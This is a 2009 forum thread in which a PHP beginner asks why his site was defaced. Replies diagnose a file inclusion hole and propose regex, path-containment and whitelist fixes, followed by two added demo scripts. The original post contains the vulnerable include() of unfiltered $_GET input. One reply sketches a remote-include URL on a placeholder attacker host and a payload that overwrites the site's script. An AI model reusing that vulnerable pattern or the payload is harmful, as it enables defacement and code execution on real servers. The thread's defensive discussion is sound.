
PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 2:35 pm
by 110%Nutter
Hi, I went to look at my website last night and found that my homepage had been replaced by something created by some Muslim Albanian / Kosovo hackers.

I would be interested in hearing from any of you who could pinpoint the weak spot in my code. I'm pretty new to PHP, so it's likely there are some newbie errors in it that let them in!!

Hope to hear from someone soon!!

Code:

<?php
    //loop through the files and see whats there
    $exts = array("php","htm","html");
    $got = 0;
    $folder = "/home/rayj/public_html/pages/";
    if ($_GET["page"] == "") $_GET["page"] = "home/home";
    $page = $folder . $_GET["page"];
    foreach ($exts as $ext) {
        if (file_exists($page . "." . $ext)) {
            $got = $page . "." . $ext;
            break;
        }
    }
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>Chris Ray | <?php
        // read the title file and use its contents to name the page
        if (!$got) {
            echo "Page not found...";
        } else if (file_exists($page . ".title")) {
            include ($page . ".title");
        } else {
            echo $_GET["page"];
        }
    ?></title>
    
    <?php
    //include java script files
        if (file_exists($page . ".js")) {
            echo "<script language=\"javascript\">";
            include ($page . ".js");
            echo "</script>";
        }
    ?>
    
    <?php
    //include meta data files
        if (file_exists($page . ".meta")) {
            include ($page . ".meta");
        }
    ?>
    
    <link href="stylesheet.css" rel="stylesheet" type="text/css"/>
    <link rel="shortcut icon" href="assets/favicon.ico"/>
    <link rel="stylesheet" href="assets/cbcscbindex.css" type="text/css" /> 
</head>
<body>
    <div id="top_bg">           
        </div>
        <div id="menu">
            <div id="menu_items">
                <ul id="ebul_cbindex_3" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=services/raid_calculator/raid_calculator" title="">Raid Calculator</a></li>
                    <li><a href="?page=services/web_hosting/web_hosting" title="">Web Hosting</a></li>
                </ul>           
                <ul id="ebul_cbindex_4" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=about_me/me/me" title="">Me</a></li>
                    <li><a href="?page=about_me/get_in_touch/get_in_touch" title="">Get In Touch</a></li>
                </ul>
                <ul id="cbindexebul_table" class="cbindexebul_menulist" style="width: 350px; height: 30px;">
                    <li class="spaced_li"><a href="?page=home/home"><img id="cbi_cbindex_1" src="assets/ebbtcbindex1_0.png" name="ebbcbindex_1" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Home" title="" /></a></li>
                    <li class="spaced_li"><a href="?page=projects/projects"><img id="cbi_cbindex_2" src="assets/ebbtcbindex2_0.png" name="ebbcbindex_2" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Projects" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_3" src="assets/ebbtcbindex3_0.png" name="ebbcbindex_3" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Services" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_4" src="assets/ebbtcbindex4_0.png" name="ebbcbindex_4" width="70" height="30" style="vertical-align: bottom;" border="0" alt="About Me" title="" /></a></li>
                    <li><a href="?page=uni/uni"><img id="cbi_cbindex_5" src="assets/ebbtcbindex5_0.png" name="ebbcbindex_5" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Uni" title="" /></a></li>
                </ul><!-- number 7 test when page missing show error message-->
                <script type="text/javascript" src="assets/cbjscbindex.js"></script>
            </div>
        </div>
        <div id="middle_bg">
            <div id="content">
                <?php
                    if (!$got) {
                        echo "Page not found...";
                    } else {
                        include($got);
                    }
                ?>
            </div>
        <div id="footer">
            <p>Designed by Chris Ray &copy; 2009 <a href="http://validator.w3.org/check?uri=http%3A%2F%2Fwww.rayjchris.co.uk%2F">XHTML</a> | <a href="http://jigsaw.w3.org/css-validator/validator?uri=www.rayjchris.co.uk&profile=css21&usermedium=all&warning=1">CSS</a></p>
        </div>  
    </div>          
    <div id="bottom_bg">
    </div>
</body>
</html>

Re: PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 6:14 pm
by tr0gd0rr
You are including a file with a name based on unscrubbed content in $_GET in the "include($got)" line.

I'm not exactly sure, but I think you can do something like:
http:// domain.com/?page=../../../../http://hacker-domain.com/exploiter.txt

Where exploiter.txt contains something like the following:

Code:

<?php
$php = '<?php echo "pwnd" ?>';
file_put_contents($_SERVER['SCRIPT_FILENAME'], $php);
You should never include files or perform exec() based on unscrubbed user-submitted content.

You could probably run a preg_match() to ensure that $_GET['page'] contains only letters, numbers and slashes, for example.

You could also check that the page is within your specified directory (untested):

Code:

$safe = false;
// compare resolved paths: dirname() alone works on the string, so a path
// such as "pages/../../x" would walk back up to "pages" without ever leaving it
$base = realpath(rtrim($folder, '/'));
$dirname = realpath($got);
while ($dirname !== false) {
  $parent = dirname($dirname);
  if ($parent == $base) {
    $safe = true;
    break;
  }
  if ($parent == $dirname) break;   // reached "/" without meeting $folder
  $dirname = $parent;
}
if (!$safe) {
  $got = $folder . '404.php';
}

Re: PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 7:30 pm
by 110%Nutter
You had an interesting theory. I gave the ?page=../../ a test, but that was stopped with the following error:

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/home/rayj/public_html/pages

Lines 2 to 15 in my code do something similar to the file location existence checking you were talking about. I'm not sure if yours takes that idea one step further? Would it be worth adding them together?

Could you give me an example of preg_match?

Thanks for your help!!

Re: PHP Exploit BUT HOW?

Posted: Tue Aug 11, 2009 10:14 pm
by tr0gd0rr
Ah yes, open_basedir.

The regex would be something like:

Code:

// anything other than letters, digits, "_", "/" or "-" is rejected;
// "." is not allowed, so ".." can never get through
if (preg_match('~[^\w/_-]~', $page)) {
  // not safe
}

And yes, file_exists will ensure that the file exists, but it will not ensure that the file is within your base directory.

I'll look into some other possible exploits; this is interesting.
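The two checks tr0gd0rr proposes (the character regex, then a containment check on the resolved file) combined in one resolver, as an added example that is not tr0gd0rr's or the original poster's code. It assumes the caller has already substituted the "home/home" default for an empty request value; the temp-dir layout, the slugs and the "escape" symlink are constructed for the demo. The containment step uses realpath(), so a file that exists inside pages/ but is a symlink to somewhere else is judged by where it really leads.

```php
<?php
// Added example, not tr0gd0rr's or the original poster's code. It applies
// both suggestions from the thread in one resolver: a character check on the
// request value, then a realpath() containment check on the file it names.
// The directory layout is constructed in a temp dir so the script runs from
// the CLI; the slugs and the "escape" symlink are made up for the demo.

function resolve_page(string $slug, string $folder, array $exts): ?string
{
    // 1. tr0gd0rr's regex: letters, digits, "_", "/" and "-" only. No "." means
    //    "../", ".php" suffix tricks and "http://" can never reach the filesystem.
    if ($slug === '' || preg_match('~[^\w/_-]~', $slug)) {
        return null;
    }
    $base = realpath($folder);
    if ($base === false) {
        return null;                      // pages directory itself is missing
    }
    foreach ($exts as $ext) {
        // realpath() returns false for a missing file (the file_exists() step)
        // and resolves symlinks, so a link inside pages/ that points elsewhere
        // is judged by where it really leads.
        $candidate = realpath($folder . '/' . $slug . '.' . $ext);
        if ($candidate === false) {
            continue;
        }
        // 2. containment: the resolved file must sit below "<base>/"
        if (strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0) {
            return $candidate;            // safe to include()
        }
    }
    return null;                          // caller prints "Page not found..."
}

// --- constructed demo layout ---
$root = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir("$root/pages/home", 0700, true);
file_put_contents("$root/pages/home/home.php", "<p>home</p>\n");
file_put_contents("$root/secret.txt", "not a page\n");
symlink("$root/secret.txt", "$root/pages/escape.php");   // exists, but leads outside

$cases = [
    'home/home'          => realpath("$root/pages/home/home.php"),
    '../secret'          => null,   // "." fails the regex
    'escape'             => null,   // exists, but resolves outside pages/
    'home/missing'       => null,   // no such file
    'http://evil.test/x' => null,   // ":" and "." fail the regex
];
$failures = 0;
foreach ($cases as $slug => $expected) {
    $got = resolve_page($slug, "$root/pages", ['php', 'htm', 'html']);
    printf("%-20s -> %s\n", $slug, $got ?? 'Page not found...');
    if ($got !== $expected) {
        $failures++;
    }
}

// clean up the temp layout
unlink("$root/pages/escape.php");
unlink("$root/pages/home/home.php");
unlink("$root/secret.txt");
rmdir("$root/pages/home");
rmdir("$root/pages");
rmdir($root);
exit($failures === 0 ? 0 : 1);
```

Run it with `php resolve_demo.php`; the only slug that resolves is home/home. The regex does most of the work on its own, but the realpath() step is what catches the symlink case, which no amount of string checking on the request value can see.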

Re: PHP Exploit BUT HOW?

Posted: Sat Aug 15, 2009 2:23 am
by kaisellgren
You've probably got some other vulnerable scripts there, too. The easiest way to safely include files like that would be to use whitelisting:

Code:

$files = array('home.php','contact.php');
if (!in_array($_GET['page'],$files))
 include('404.php');
else
 include($_GET['page']);
No one can now manipulate your inclusions.
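The whitelist idea taken one step further, as an added example that is not kaisellgren's or the original poster's code: the request value is used only as a key into a map, so the string the visitor sends never becomes any part of a path, and the .title and body files are derived from the trusted map entry the way the original template derives them from $page. The map, the temp-dir layout and the sample requests are constructed for the demo; companion files are read rather than include()d to keep the demo self-contained.

```php
<?php
// Added example, not kaisellgren's or the original poster's code: allowlist
// routing where the request value is only ever a lookup key. The map, the
// temp-dir layout and the sample requests are constructed for the demo.

// key sent as ?page=<key>  =>  page base name below the pages directory
const PAGE_MAP = [
    'home'     => 'home/home',
    'projects' => 'projects/projects',
    'me'       => 'about_me/me/me',
];

// Returns the trusted base path (without extension) or null for a 404.
// Every file the template later reads is derived from this value, never
// from $query, so there is no path to validate.
function select_page(array $query, string $folder): ?string
{
    $key = $query['page'] ?? '';
    if ($key === '') {
        $key = 'home';                            // default, as in the original's home/home
    }
    // ?page[]=home arrives as an array; it is not a key we know,
    // so it gets the 404 like any other unknown value
    if (!is_string($key) || !array_key_exists($key, PAGE_MAP)) {
        return null;
    }
    return rtrim($folder, '/') . '/' . PAGE_MAP[$key];
}

// Companion files (.title, .meta, .js) and the page body sit next to the base
// name, as in the original template; here they are read rather than include()d.
function render(?string $base, array $exts): string
{
    if ($base === null) {
        return "<title>Page not found...</title>\n";
    }
    $title = is_file("$base.title") ? trim(file_get_contents("$base.title")) : basename($base);
    $out = '<title>' . htmlspecialchars($title, ENT_QUOTES) . "</title>\n";
    foreach ($exts as $ext) {
        if (is_file("$base.$ext")) {
            return $out . file_get_contents("$base.$ext");
        }
    }
    return $out . "<p>Page not found...</p>\n";  // key known, file missing on disk
}

// --- constructed demo ---
$root = sys_get_temp_dir() . '/allowlist_demo_' . getmypid();
mkdir("$root/home", 0700, true);
file_put_contents("$root/home/home.php", "<p>welcome</p>\n");
file_put_contents("$root/home/home.title", "Home\n");

$requests = [
    ['page' => 'home'],               // allowed key
    ['page' => '../../etc/passwd'],   // not a key => 404, no filesystem access at all
    ['page' => ['home']],             // ?page[]=home => not a string => 404
    [],                               // no parameter => default key 'home'
];
foreach ($requests as $q) {
    echo json_encode($q), " =>\n", render(select_page($q, $root), ['php', 'htm', 'html']);
}

unlink("$root/home/home.php");
unlink("$root/home/home.title");
rmdir("$root/home");
rmdir($root);
```

kaisellgren's in_array() version is already safe because the include() argument can only be one of the listed strings; the map form adds the convenience of short keys in the URL and makes it impossible to forget that rule at any of the five include sites in the original template, since none of them ever sees $_GET.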